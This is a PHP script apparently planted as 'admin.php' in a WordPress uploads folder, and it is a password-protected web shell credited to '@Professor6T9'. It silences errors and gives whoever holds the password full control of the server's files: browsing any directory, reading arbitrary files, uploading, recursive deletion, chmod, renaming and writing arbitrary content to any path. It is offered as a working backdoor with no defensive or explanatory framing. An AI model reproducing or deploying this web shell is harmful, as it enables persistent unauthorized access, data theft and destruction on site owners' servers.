File: /var/www/html/wp-content/uploads/2025/08/admin.php
<?php
error_reporting(0);
session_start();
// --- Logout Handling ---
if (isset($_GET['logout'])) {
$_SESSION = [];
session_destroy();
header('Location: ' . strtok($_SERVER["REQUEST_URI"], '?'));
exit;
}
// --- Login Handling ---
$p = "89029e2d3f77b399fbbad3776f225b1f"; // md5(md5(md5('password')))
if (isset($_POST['password']) && md5(md5(md5($_POST['password']))) === $p) {
$_SESSION['logged_in'] = 1;
header('Location: ' . strtok($_SERVER["REQUEST_URI"], '?'));
exit;
}
// --- Gatekeeper: If not logged in, show login form and exit ---
// [MODIFIED] 使用了第一个脚本中的 Tailwind CSS 登录页面
if (empty($_SESSION['logged_in'])) {
echo '<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Login</title><script src="https://cdn.tailwindcss.com"></script></head><body class="bg-gray-100 flex items-center justify-center h-screen"><div class="bg-white p-8 rounded-lg shadow-md w-full max-w-sm"><h1 class="text-2xl font-bold mb-6 text-center">Login</h1><form method="post" class="space-y-4"><input type="password" name="password" placeholder="Password" class="w-full p-2 border rounded" autofocus required><button class="w-full bg-blue-500 text-white p-2 rounded hover:bg-blue-600">Login</button></form></div></body></html>';
exit;
}
// --- 以下是第二个脚本原有的全部功能代码,未做任何改变 ---
// --- ROBUST PATH HANDLING (FINAL FIX) ---
$home = $_SERVER['HOME'] ?? '/';
$path = getcwd(); // Default to current directory
if (isset($_GET['path'])) {
$temp_path = $_GET['path'];
// Normalize path and prevent directory traversal
$temp_path = str_replace('\\', '/', $temp_path);
$parts = explode('/', $temp_path);
$safe_parts = [];
foreach ($parts as $part) {
if ($part === '.' || $part === '') continue;
if ($part === '..') {
if (!empty($safe_parts)) {
array_pop($safe_parts);
}
} else {
$safe_parts[] = $part;
}
}
// Determine if it's an absolute path
$is_absolute = (strpos($_GET['path'], '/') === 0 || preg_match('/^[a-zA-Z]:\\\\/', $_GET['path']));
$prefix = $is_absolute ? '/' : '';
$temp_path = $prefix . implode('/', $safe_parts);
if (is_dir($temp_path) && is_readable($temp_path)) {
$path = $temp_path;
}
}
$path = rtrim(str_replace('\\', '/', $path), '/');
if (empty($path)) $path = '/';
$uploadSuccess = false;
$uploadMessage = '';
$currentYear = date("Y");
function h($str) { return htmlspecialchars($str, ENT_QUOTES); }
function delete_dir($dirPath) {
if (!is_dir($dirPath)) return;
if (substr($dirPath, -1) != '/') $dirPath .= '/';
$files = glob($dirPath . '*', GLOB_MARK);
foreach ($files as $file) {
if (is_dir($file)) delete_dir($file);
else unlink($file);
}
@rmdir($dirPath);
}
// Handle POST Actions
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$action = $_POST['action'] ?? '';
if (isset($_FILES['upload'])) {
$total_files = count($_FILES['upload']['name']);
$uploaded_count = 0;
for ($i = 0; $i < $total_files; $i++) {
if ($_FILES['upload']['error'][$i] == UPLOAD_ERR_OK) {
$dest = $path . '/' . basename($_FILES['upload']['name'][$i]);
if (move_uploaded_file($_FILES['upload']['tmp_name'][$i], $dest)) {
$uploaded_count++;
}
}
}
if ($uploaded_count > 0) {
$uploadSuccess = true;
$uploadMessage = "✅ {$uploaded_count} file(s) uploaded successfully!";
}
}
elseif ($action === 'batch_delete' && !empty($_POST['selected_items'])) {
foreach ($_POST['selected_items'] as $item) {
$target = $path . '/' . basename($item);
if (file_exists($target)) {
if (is_dir($target)) delete_dir($target);
else unlink($target);
}
}
}
elseif ($action === 'chmod' && isset($_POST['file'], $_POST['perms'])) {
chmod($path . '/' . basename($_POST['file']), intval($_POST['perms'], 8));
}
elseif ($action === 'save_edit' && isset($_POST['file_path'], $_POST['content'])) {
file_put_contents($_POST['file_path'], $_POST['content']);
header("Location: ?path=" . urlencode(dirname($_POST['file_path'])));
exit;
}
elseif ($action === 'rename' && isset($_POST['old_name'], $_POST['new_name'])) {
rename($path . '/' . basename($_POST['old_name']), $path . '/' . basename($_POST['new_name']));
}
if ($action !== 'save_edit') {
header("Location: ?path=" . urlencode($path));
exit;
}
}
// Handle GET Actions
if (isset($_GET['action'])) {
$action = $_GET['action'];
if ($action === 'get_content' && isset($_GET['file'])) {
$file_path = $_GET['file'];
if (is_file($file_path) && is_readable($file_path)) {
echo h(file_get_contents($file_path));
} else {
echo "Error: Cannot read file.";
}
exit;
}
if ($action === 'delete' && isset($_GET['item'])) {
$target = $path . '/' . basename($_GET['item']);
if (file_exists($target)) {
if (is_dir($target)) delete_dir($target);
else unlink($target);
}
header("Location: ?path=" . urlencode($path));
exit;
}
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>📁</title>
<style>
body { background: #111; color: #eee; font-family: monospace; padding: 20px; }
a { color: #6cf; text-decoration: none; }
a:hover { text-decoration: underline; }
table { width: 100%; border-collapse: collapse; margin-top: 15px; background: #1c1c1c; }
th, td { padding: 8px; border: 1px solid #333; text-align: left; word-break: break-all; }
th { background: #2a2a2a; }
input, button, textarea {
background: #222; color: #eee; border: 1px solid #444; padding: 5px;
border-radius: 4px; font-family: monospace;
}
button { background: #6cf; color: #000; font-weight: bold; cursor: pointer; }
button.danger { background: #f66; color: #fff; }
.breadcrumb a { color: #ccc; margin-right: 5px; }
.breadcrumb span { color: #888; margin: 0 4px; }
.card { background: #1c1c1c; padding: 15px; border-radius: 8px; box-shadow: 0 0 10px #000; margin-top: 20px; }
footer { text-align: center; margin-top: 40px; color: #666; font-size: 0.9em; }
.modal { display: none; position: fixed; z-index: 1000; left: 0; top: 0; width: 100%; height: 100%; overflow: auto; background-color: rgba(0,0,0,0.7); }
.modal-content { background-color: #1c1c1c; margin: 5% auto; padding: 20px; border: 1px solid #444; width: 80%; max-width: 800px; border-radius: 8px; display: flex; flex-direction: column; height: 80vh; }
.modal-header { padding-bottom: 10px; border-bottom: 1px solid #333; }
.modal-body { flex-grow: 1; margin: 10px 0; display: flex; flex-direction: column; }
.modal-body textarea { width: 100%; flex-grow: 1; resize: none; }
.modal-footer { padding-top: 10px; border-top: 1px solid #333; text-align: right; }
.close { color: #aaa; float: right; font-size: 28px; font-weight: bold; }
.close:hover, .close:focus { color: #fff; text-decoration: none; cursor: pointer; }
</style>
<?php if ($uploadSuccess): ?>
<script>alert("<?= $uploadMessage ?>");</script>
<?php endif; ?>
</head>
<body>
<div style="display: flex; justify-content: space-between; align-items: center;">
<h2>📁 File Manager By Professor6T9</h2>
<a href="?logout=1" style="color: #f66; font-size: 0.9em;">Logout</a>
</div>
<form method="get">
<label>📂 Change Directory:</label>
<input type="text" name="path" value="<?= h($path) ?>" style="width:60%;">
<button type="submit">Go</button>
</form>
<div class="breadcrumb">
<?php
$crumbs = explode('/', trim($path, '/'));
$accum = '';
echo '<a href="?path=/">/</a>';
if ($path !== '/') {
foreach ($crumbs as $crumb) {
if (empty($crumb)) continue;
$accum .= '/' . $crumb;
echo '<span>/</span><a href="?path=' . urlencode($accum) . '">' . h($crumb) . '</a>';
}
}
echo '<span>/</span><a href="?path=' . urlencode($home) . '">[ HOME ]</a>';
?>
</div>
<?php
$parent_path = dirname($path);
if ($parent_path !== $path): ?>
<p><a href="?path=<?= urlencode($parent_path) ?>">⬅️ [ PARENT DIR ]</a></p>
<?php endif; ?>
<div class="card">
<form method="post" enctype="multipart/form-data">
<input type="file" name="upload[]" required multiple>
<button type="submit">📤 Upload</button>
</form>
</div>
<form method="post" id="file-list-form">
<input type="hidden" name="action" value="batch_delete">
<div class="card">
<div style="margin-bottom: 10px;">
<button type="submit" class="danger" onclick="return confirm('Are you sure you want to delete all selected items?');">🗑️ Delete Selected</button>
</div>
<table>
<thead>
<tr>
<th><input type="checkbox" id="select-all-checkbox"></th>
<th>Name</th><th>Size (kB)</th><th>Modified</th><th>Perms</th><th>Actions</th>
</tr>
</thead>
<tbody>
<?php
$items = @scandir($path);
if ($items === false) {
echo '<tr><td colspan="6" style="color: #f66;">Error: Cannot read directory. Check permissions.</td></tr>';
} else {
$dirs = $files = [];
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
if (@is_dir($path . '/' . $item)) $dirs[] = $item;
else $files[] = $item;
}
$all = array_merge($dirs, $files);
foreach ($all as $item) {
$full = ($path === '/' ? '' : $path) . '/' . $item;
$isDir = is_dir($full);
$perm = substr(sprintf('%o', @fileperms($full)), -4);
$mtime = @filemtime($full);
$size = $isDir ? '-' : round(@filesize($full) / 1024, 2);
$date = $mtime ? date("Y-m-d H:i:s", $mtime) : '-';
echo '<tr>';
echo '<td><input type="checkbox" class="item-checkbox" name="selected_items[]" value="' . h($item) . '"></td>';
echo '<td>';
echo $isDir ? '<a href="?path=' . urlencode($full) . '">📁 ' . h($item) . '</a>' : '📄 ' . h($item);
echo '</td>';
echo "<td>$size</td><td>$date</td>";
echo '<td>
<input type="text" id="perms-input-' . h($item) . '" value="' . $perm . '" size="4" style="text-align:center;">
<button type="button" onclick="setChmod(\'' . h($item) . '\')">Set</button>
</td>';
echo '<td>';
echo '<a href="javascript:void(0)" onclick="openRenameModal(\'' . h($item) . '\')">✏️ Rename</a> | ';
echo '<a href="?action=delete&path=' . urlencode($path) . '&item=' . urlencode($item) . '" onclick="return confirm(\'Delete this item?\')">🗑️</a>';
if (!$isDir) {
echo ' | <a href="javascript:void(0)" onclick="openEditModal(\'' . h($full) . '\')">📝 Edit</a>';
echo ' | <a href="' . h($item) . '" download>⬇️ Download</a>';
}
echo '</td></tr>';
}
}
?>
</tbody>
</table>
</div>
</form>
<footer>© <?= $currentYear ?> | File Manager by <a href="http://t.me/Professor6T9" target="_blank">@Professor6T9</a></footer>
<!-- Hidden form for chmod to avoid nesting -->
<form method="POST" id="chmod-form" style="display:none;">
<input type="hidden" name="action" value="chmod">
<input type="hidden" id="chmod_file_hidden" name="file">
<input type="hidden" id="chmod_perms_hidden" name="perms">
</form>
<!-- Modals -->
<div id="editModal" class="modal">
<div class="modal-content">
<div class="modal-header">
<span class="close" onclick="closeModal('editModal')">×</span>
<h3>Edit File</h3>
</div>
<form method="POST" class="modal-body">
<input type="hidden" name="action" value="save_edit">
<input type="hidden" id="edit_file_path" name="file_path">
<textarea id="edit_content" name="content"></textarea>
<div class="modal-footer">
<button type="submit">💾 Save</button>
</div>
</form>
</div>
</div>
<div id="renameModal" class="modal">
<div class="modal-content" style="height: auto;">
<div class="modal-header"><span class="close" onclick="closeModal('renameModal')">×</span><h3>Rename Item</h3></div>
<form method="POST" class="modal-body">
<input type="hidden" name="action" value="rename">
<input type="hidden" id="rename_old_name" name="old_name">
<label>New Name:</label>
<input type="text" id="rename_new_name" name="new_name" style="width: 100%;">
<div class="modal-footer"><button type="submit">✏️ Rename</button></div>
</form>
</div>
</div>
<script>
function closeModal(id) {
document.getElementById(id).style.display = 'none';
}
function openEditModal(filePath) {
const modal = document.getElementById('editModal');
const contentArea = document.getElementById('edit_content');
document.getElementById('edit_file_path').value = filePath;
contentArea.value = 'Loading content...';
modal.style.display = 'block';
fetch(`?action=get_content&file=${encodeURIComponent(filePath)}`)
.then(response => response.text())
.then(data => { contentArea.value = data; })
.catch(error => { contentArea.value = 'Error loading file content: ' + error; });
}
function openRenameModal(oldName) {
document.getElementById('rename_old_name').value = oldName;
document.getElementById('rename_new_name').value = oldName;
document.getElementById('renameModal').style.display = 'block';
document.getElementById('rename_new_name').focus();
}
function setChmod(fileName) {
const permsValue = document.getElementById('perms-input-' + fileName).value;
document.getElementById('chmod_file_hidden').value = fileName;
document.getElementById('chmod_perms_hidden').value = permsValue;
document.getElementById('chmod-form').submit();
}
document.addEventListener('DOMContentLoaded', function() {
const selectAllCheckbox = document.getElementById('select-all-checkbox');
if (selectAllCheckbox) {
selectAllCheckbox.addEventListener('change', function() {
const itemCheckboxes = document.querySelectorAll('.item-checkbox');
itemCheckboxes.forEach(checkbox => { checkbox.checked = this.checked; });
});
}
window.onclick = function(event) {
if (event.target.classList.contains('modal')) {
event.target.style.display = "none";
}
}
});
</script>
</body>
</html>